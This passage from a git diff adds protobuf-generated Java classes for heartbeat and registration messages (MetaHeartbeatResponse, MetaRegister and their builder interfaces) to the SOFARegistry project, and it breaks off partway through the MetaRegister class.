Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public interface MetaHeartbeatRequestOrBuilder + extends + // @@protoc_insertion_point(interface_extends:MetaHeartbeatRequest) + com.google.protobuf.MessageOrBuilder { + + /** repeated string revisions = 1; */ + java.util.List getRevisionsList(); + /** repeated string revisions = 1; */ + int getRevisionsCount(); + /** repeated string revisions = 1; */ + java.lang.String getRevisions(int index); + /** repeated string revisions = 1; */ + com.google.protobuf.ByteString getRevisionsBytes(int index); +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/MetaHeartbeatResponse.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/MetaHeartbeatResponse.java new file mode 100644 index 000000000..d78bacf10 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/MetaHeartbeatResponse.java @@ -0,0 +1,575 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +/** Protobuf type {@code MetaHeartbeatResponse} */ +public final class MetaHeartbeatResponse extends com.google.protobuf.GeneratedMessageV3 + implements + // @@protoc_insertion_point(message_implements:MetaHeartbeatResponse) + MetaHeartbeatResponseOrBuilder { + private static final long serialVersionUID = 0L; + // Use MetaHeartbeatResponse.newBuilder() to construct. + private MetaHeartbeatResponse(com.google.protobuf.GeneratedMessageV3.Builder builder) { + super(builder); + } + + private MetaHeartbeatResponse() { + statusCode_ = 0; + message_ = ""; + } + + @java.lang.Override + public final com.google.protobuf.UnknownFieldSet getUnknownFields() { + return this.unknownFields; + } + + private MetaHeartbeatResponse( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + this(); + if (extensionRegistry == null) { + throw new java.lang.NullPointerException(); + } + int mutable_bitField0_ = 0; + com.google.protobuf.UnknownFieldSet.Builder unknownFields = + com.google.protobuf.UnknownFieldSet.newBuilder(); + try { + boolean done = false; + while (!done) { + int tag = input.readTag(); + switch (tag) { + case 0: + done = true; + break; + default: + { + if (!parseUnknownFieldProto3(input, unknownFields, extensionRegistry, tag)) { + done = true; + } + break; + } + case 8: + { + statusCode_ = input.readInt32(); + break; + } + case 18: + { + java.lang.String s = input.readStringRequireUtf8(); + + message_ = s; + break; + } + } + } + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + throw e.setUnfinishedMessage(this); + } catch (java.io.IOException e) { + throw new com.google.protobuf.InvalidProtocolBufferException(e).setUnfinishedMessage(this); + } finally { + this.unknownFields = unknownFields.build(); + makeExtensionsImmutable(); + } + } + + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_MetaHeartbeatResponse_descriptor; + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_MetaHeartbeatResponse_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse.class, + com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse.Builder.class); + } + + public static final int STATUSCODE_FIELD_NUMBER = 1; + private int statusCode_; + /** int32 statusCode = 1; */ + public int getStatusCode() { + return statusCode_; + } + + public static final int MESSAGE_FIELD_NUMBER = 2; + private volatile java.lang.Object message_; + /** string message = 2; */ + public java.lang.String getMessage() { + java.lang.Object ref = message_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + message_ = s; + return s; + } + } + /** string message = 2; */ + public com.google.protobuf.ByteString getMessageBytes() { + java.lang.Object ref = message_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + message_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + private byte memoizedIsInitialized = -1; + + public final boolean isInitialized() { + byte isInitialized = memoizedIsInitialized; + if (isInitialized == 1) return true; + if (isInitialized == 0) return false; + + memoizedIsInitialized = 1; + return true; + } + + public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { + if (statusCode_ != 0) { + output.writeInt32(1, statusCode_); + } + if (!getMessageBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 2, message_); + } + unknownFields.writeTo(output); + } + + public int getSerializedSize() { + int size = memoizedSize; + if (size != -1) return size; + + size = 0; + if (statusCode_ != 0) { + size += com.google.protobuf.CodedOutputStream.computeInt32Size(1, statusCode_); + } + if (!getMessageBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, message_); + } + size += unknownFields.getSerializedSize(); + memoizedSize = size; + return size; + } + + @java.lang.Override + public boolean equals(final java.lang.Object obj) { + if (obj == this) { + return true; + } + if (!(obj instanceof com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse)) { + return super.equals(obj); + } + com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse other = + (com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse) obj; + + boolean result = true; + result = result && (getStatusCode() == other.getStatusCode()); + result = result && getMessage().equals(other.getMessage()); + result = result && unknownFields.equals(other.unknownFields); + return result; + } + + @java.lang.Override + public int hashCode() { + if (memoizedHashCode != 0) { + return memoizedHashCode; + } + int hash = 41; + hash = (19 * hash) + getDescriptor().hashCode(); + hash = (37 * hash) + STATUSCODE_FIELD_NUMBER; + hash = (53 * hash) + getStatusCode(); + hash = (37 * hash) + MESSAGE_FIELD_NUMBER; + hash = (53 * hash) + getMessage().hashCode(); + hash = (29 * hash) + unknownFields.hashCode(); + memoizedHashCode = hash; + return hash; + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse parseFrom( + java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse parseFrom( + java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse parseFrom( + com.google.protobuf.ByteString data) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse parseFrom( + com.google.protobuf.ByteString data, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse parseFrom( + byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse parseFrom( + byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse parseFrom( + java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse parseFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse + parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse + parseDelimitedFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse parseFrom( + com.google.protobuf.CodedInputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse parseFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public Builder newBuilderForType() { + return newBuilder(); + } + + public static Builder newBuilder() { + return DEFAULT_INSTANCE.toBuilder(); + } + + public static Builder newBuilder( + com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse prototype) { + return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); + } + + public Builder toBuilder() { + return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); + } + + @java.lang.Override + protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + Builder builder = new Builder(parent); + return builder; + } + /** Protobuf type {@code MetaHeartbeatResponse} */ + public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder + implements + // @@protoc_insertion_point(builder_implements:MetaHeartbeatResponse) + com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponseOrBuilder { + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_MetaHeartbeatResponse_descriptor; + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_MetaHeartbeatResponse_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse.class, + com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse.Builder.class); + } + + // Construct using + // com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse.newBuilder() + private Builder() { + maybeForceBuilderInitialization(); + } + + private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + super(parent); + maybeForceBuilderInitialization(); + } + + private void maybeForceBuilderInitialization() { + if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) {} + } + + public Builder clear() { + super.clear(); + statusCode_ = 0; + + message_ = ""; + + return this; + } + + public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_MetaHeartbeatResponse_descriptor; + } + + public com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse + getDefaultInstanceForType() { + return com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse + .getDefaultInstance(); + } + + public com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse build() { + com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse result = buildPartial(); + if (!result.isInitialized()) { + throw newUninitializedMessageException(result); + } + return result; + } + + public com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse buildPartial() { + com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse result = + new com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse(this); + result.statusCode_ = statusCode_; + result.message_ = message_; + onBuilt(); + return result; + } + + public Builder clone() { + return (Builder) super.clone(); + } + + public Builder setField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.setField(field, value); + } + + public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { + return (Builder) super.clearField(field); + } + + public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { + return (Builder) super.clearOneof(oneof); + } + + public Builder setRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { + return (Builder) super.setRepeatedField(field, index, value); + } + + public Builder addRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.addRepeatedField(field, value); + } + + public Builder mergeFrom(com.google.protobuf.Message other) { + if (other instanceof com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse) { + return mergeFrom( + (com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse) other); + } else { + super.mergeFrom(other); + return this; + } + } + + public Builder mergeFrom( + com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse other) { + if (other + == com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse + .getDefaultInstance()) return this; + if (other.getStatusCode() != 0) { + setStatusCode(other.getStatusCode()); + } + if (!other.getMessage().isEmpty()) { + message_ = other.message_; + onChanged(); + } + this.mergeUnknownFields(other.unknownFields); + onChanged(); + return this; + } + + public final boolean isInitialized() { + return true; + } + + public Builder mergeFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse parsedMessage = null; + try { + parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry); + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + parsedMessage = + (com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse) + e.getUnfinishedMessage(); + throw e.unwrapIOException(); + } finally { + if (parsedMessage != null) { + mergeFrom(parsedMessage); + } + } + return this; + } + + private int statusCode_; + /** int32 statusCode = 1; */ + public int getStatusCode() { + return statusCode_; + } + /** int32 statusCode = 1; */ + public Builder setStatusCode(int value) { + + statusCode_ = value; + onChanged(); + return this; + } + /** int32 statusCode = 1; */ + public Builder clearStatusCode() { + + statusCode_ = 0; + onChanged(); + return this; + } + + private java.lang.Object message_ = ""; + /** string message = 2; */ + public java.lang.String getMessage() { + java.lang.Object ref = message_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + message_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string message = 2; */ + public com.google.protobuf.ByteString getMessageBytes() { + java.lang.Object ref = message_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + message_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string message = 2; */ + public Builder setMessage(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + message_ = value; + onChanged(); + return this; + } + /** string message = 2; */ + public Builder clearMessage() { + + message_ = getDefaultInstance().getMessage(); + onChanged(); + return this; + } + /** string message = 2; */ + public Builder setMessageBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + message_ = value; + onChanged(); + return this; + } + + public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.setUnknownFieldsProto3(unknownFields); + } + + public final Builder mergeUnknownFields( + final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.mergeUnknownFields(unknownFields); + } + + // @@protoc_insertion_point(builder_scope:MetaHeartbeatResponse) + } + + // @@protoc_insertion_point(class_scope:MetaHeartbeatResponse) + private static final com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse + DEFAULT_INSTANCE; + + static { + DEFAULT_INSTANCE = new com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse(); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse + getDefaultInstance() { + return DEFAULT_INSTANCE; + } + + private static final com.google.protobuf.Parser PARSER = + new com.google.protobuf.AbstractParser() { + public MetaHeartbeatResponse parsePartialFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return new MetaHeartbeatResponse(input, extensionRegistry); + } + }; + + public static com.google.protobuf.Parser parser() { + return PARSER; + } + + @java.lang.Override + public com.google.protobuf.Parser getParserForType() { + return PARSER; + } + + public com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse + getDefaultInstanceForType() { + return DEFAULT_INSTANCE; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/MetaHeartbeatResponseOrBuilder.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/MetaHeartbeatResponseOrBuilder.java new file mode 100644 index 000000000..2c0ebb38c --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/MetaHeartbeatResponseOrBuilder.java @@ -0,0 +1,31 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public interface MetaHeartbeatResponseOrBuilder + extends + // @@protoc_insertion_point(interface_extends:MetaHeartbeatResponse) + com.google.protobuf.MessageOrBuilder { + + /** int32 statusCode = 1; */ + int getStatusCode(); + + /** string message = 2; */ + java.lang.String getMessage(); + /** string message = 2; */ + com.google.protobuf.ByteString getMessageBytes(); +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/MetaRegister.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/MetaRegister.java new file mode 100644 index 000000000..d2e75d360 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/MetaRegister.java @@ -0,0 +1,1240 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +/** Protobuf type {@code MetaRegister} */ +public final class MetaRegister extends com.google.protobuf.GeneratedMessageV3 + implements + // @@protoc_insertion_point(message_implements:MetaRegister) + MetaRegisterOrBuilder { + private static final long serialVersionUID = 0L; + // Use MetaRegister.newBuilder() to construct. + private MetaRegister(com.google.protobuf.GeneratedMessageV3.Builder builder) { + super(builder); + } + + private MetaRegister() { + application_ = ""; + revision_ = ""; + clientVersion_ = ""; + } + + @java.lang.Override + public final com.google.protobuf.UnknownFieldSet getUnknownFields() { + return this.unknownFields; + } + + private MetaRegister( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + this(); + if (extensionRegistry == null) { + throw new java.lang.NullPointerException(); + } + int mutable_bitField0_ = 0; + com.google.protobuf.UnknownFieldSet.Builder unknownFields = + com.google.protobuf.UnknownFieldSet.newBuilder(); + try { + boolean done = false; + while (!done) { + int tag = input.readTag(); + switch (tag) { + case 0: + done = true; + break; + default: + { + if (!parseUnknownFieldProto3(input, unknownFields, extensionRegistry, tag)) { + done = true; + } + break; + } + case 10: + { + java.lang.String s = input.readStringRequireUtf8(); + + application_ = s; + break; + } + case 18: + { + java.lang.String s = input.readStringRequireUtf8(); + + revision_ = s; + break; + } + case 26: + { + java.lang.String s = input.readStringRequireUtf8(); + + clientVersion_ = s; + break; + } + case 34: + { + if (!((mutable_bitField0_ & 0x00000008) == 0x00000008)) { + baseParams_ = + com.google.protobuf.MapField.newMapField( + BaseParamsDefaultEntryHolder.defaultEntry); + mutable_bitField0_ |= 0x00000008; + } + com.google.protobuf.MapEntry< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.StringList> + baseParams__ = + input.readMessage( + BaseParamsDefaultEntryHolder.defaultEntry.getParserForType(), + extensionRegistry); + baseParams_.getMutableMap().put(baseParams__.getKey(), baseParams__.getValue()); + break; + } + case 42: + { + if (!((mutable_bitField0_ & 0x00000010) == 0x00000010)) { + services_ = + com.google.protobuf.MapField.newMapField( + ServicesDefaultEntryHolder.defaultEntry); + mutable_bitField0_ |= 0x00000010; + } + com.google.protobuf.MapEntry< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.MetaService> + services__ = + input.readMessage( + ServicesDefaultEntryHolder.defaultEntry.getParserForType(), + extensionRegistry); + services_.getMutableMap().put(services__.getKey(), services__.getValue()); + break; + } + } + } + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + throw e.setUnfinishedMessage(this); + } catch (java.io.IOException e) { + throw new com.google.protobuf.InvalidProtocolBufferException(e).setUnfinishedMessage(this); + } finally { + this.unknownFields = unknownFields.build(); + makeExtensionsImmutable(); + } + } + + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_MetaRegister_descriptor; + } + + @SuppressWarnings({"rawtypes"}) + protected com.google.protobuf.MapField internalGetMapField(int number) { + switch (number) { + case 4: + return internalGetBaseParams(); + case 5: + return internalGetServices(); + default: + throw new RuntimeException("Invalid map field number: " + number); + } + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_MetaRegister_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.MetaRegister.class, + com.alipay.sofa.registry.common.model.client.pb.MetaRegister.Builder.class); + } + + private int bitField0_; + public static final int APPLICATION_FIELD_NUMBER = 1; + private volatile java.lang.Object application_; + /** string application = 1; */ + public java.lang.String getApplication() { + java.lang.Object ref = application_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + application_ = s; + return s; + } + } + /** string application = 1; */ + public com.google.protobuf.ByteString getApplicationBytes() { + java.lang.Object ref = application_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + application_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + public static final int REVISION_FIELD_NUMBER = 2; + private volatile java.lang.Object revision_; + /** string revision = 2; */ + public java.lang.String getRevision() { + java.lang.Object ref = revision_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + revision_ = s; + return s; + } + } + /** string revision = 2; */ + public com.google.protobuf.ByteString getRevisionBytes() { + java.lang.Object ref = revision_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + revision_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + public static final int CLIENTVERSION_FIELD_NUMBER = 3; + private volatile java.lang.Object clientVersion_; + /** string clientVersion = 3; */ + public java.lang.String getClientVersion() { + java.lang.Object ref = clientVersion_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + clientVersion_ = s; + return s; + } + } + /** string clientVersion = 3; */ + public com.google.protobuf.ByteString getClientVersionBytes() { + java.lang.Object ref = clientVersion_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + clientVersion_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + public static final int BASEPARAMS_FIELD_NUMBER = 4; + + private static final class BaseParamsDefaultEntryHolder { + static final com.google.protobuf.MapEntry< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.StringList> + defaultEntry = + com.google.protobuf.MapEntry + . + newDefaultInstance( + com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_MetaRegister_BaseParamsEntry_descriptor, + com.google.protobuf.WireFormat.FieldType.STRING, + "", + com.google.protobuf.WireFormat.FieldType.MESSAGE, + com.alipay.sofa.registry.common.model.client.pb.StringList + .getDefaultInstance()); + } + + private com.google.protobuf.MapField< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.StringList> + baseParams_; + + private com.google.protobuf.MapField< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.StringList> + internalGetBaseParams() { + if (baseParams_ == null) { + return com.google.protobuf.MapField.emptyMapField(BaseParamsDefaultEntryHolder.defaultEntry); + } + return baseParams_; + } + + public int getBaseParamsCount() { + return internalGetBaseParams().getMap().size(); + } + /** map<string, .StringList> baseParams = 4; */ + public boolean containsBaseParams(java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + return internalGetBaseParams().getMap().containsKey(key); + } + /** Use {@link #getBaseParamsMap()} instead. */ + @java.lang.Deprecated + public java.util.Map + getBaseParams() { + return getBaseParamsMap(); + } + /** map<string, .StringList> baseParams = 4; */ + public java.util.Map + getBaseParamsMap() { + return internalGetBaseParams().getMap(); + } + /** map<string, .StringList> baseParams = 4; */ + public com.alipay.sofa.registry.common.model.client.pb.StringList getBaseParamsOrDefault( + java.lang.String key, + com.alipay.sofa.registry.common.model.client.pb.StringList defaultValue) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + java.util.Map + map = internalGetBaseParams().getMap(); + return map.containsKey(key) ? map.get(key) : defaultValue; + } + /** map<string, .StringList> baseParams = 4; */ + public com.alipay.sofa.registry.common.model.client.pb.StringList getBaseParamsOrThrow( + java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + java.util.Map + map = internalGetBaseParams().getMap(); + if (!map.containsKey(key)) { + throw new java.lang.IllegalArgumentException(); + } + return map.get(key); + } + + public static final int SERVICES_FIELD_NUMBER = 5; + + private static final class ServicesDefaultEntryHolder { + static final com.google.protobuf.MapEntry< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.MetaService> + defaultEntry = + com.google.protobuf.MapEntry + . + newDefaultInstance( + com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_MetaRegister_ServicesEntry_descriptor, + com.google.protobuf.WireFormat.FieldType.STRING, + "", + com.google.protobuf.WireFormat.FieldType.MESSAGE, + com.alipay.sofa.registry.common.model.client.pb.MetaService + .getDefaultInstance()); + } + + private com.google.protobuf.MapField< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.MetaService> + services_; + + private com.google.protobuf.MapField< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.MetaService> + internalGetServices() { + if (services_ == null) { + return com.google.protobuf.MapField.emptyMapField(ServicesDefaultEntryHolder.defaultEntry); + } + return services_; + } + + public int getServicesCount() { + return internalGetServices().getMap().size(); + } + /** map<string, .MetaService> services = 5; */ + public boolean containsServices(java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + return internalGetServices().getMap().containsKey(key); + } + /** Use {@link #getServicesMap()} instead. */ + @java.lang.Deprecated + public java.util.Map< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.MetaService> + getServices() { + return getServicesMap(); + } + /** map<string, .MetaService> services = 5; */ + public java.util.Map< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.MetaService> + getServicesMap() { + return internalGetServices().getMap(); + } + /** map<string, .MetaService> services = 5; */ + public com.alipay.sofa.registry.common.model.client.pb.MetaService getServicesOrDefault( + java.lang.String key, + com.alipay.sofa.registry.common.model.client.pb.MetaService defaultValue) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + java.util.Map + map = internalGetServices().getMap(); + return map.containsKey(key) ? map.get(key) : defaultValue; + } + /** map<string, .MetaService> services = 5; */ + public com.alipay.sofa.registry.common.model.client.pb.MetaService getServicesOrThrow( + java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + java.util.Map + map = internalGetServices().getMap(); + if (!map.containsKey(key)) { + throw new java.lang.IllegalArgumentException(); + } + return map.get(key); + } + + private byte 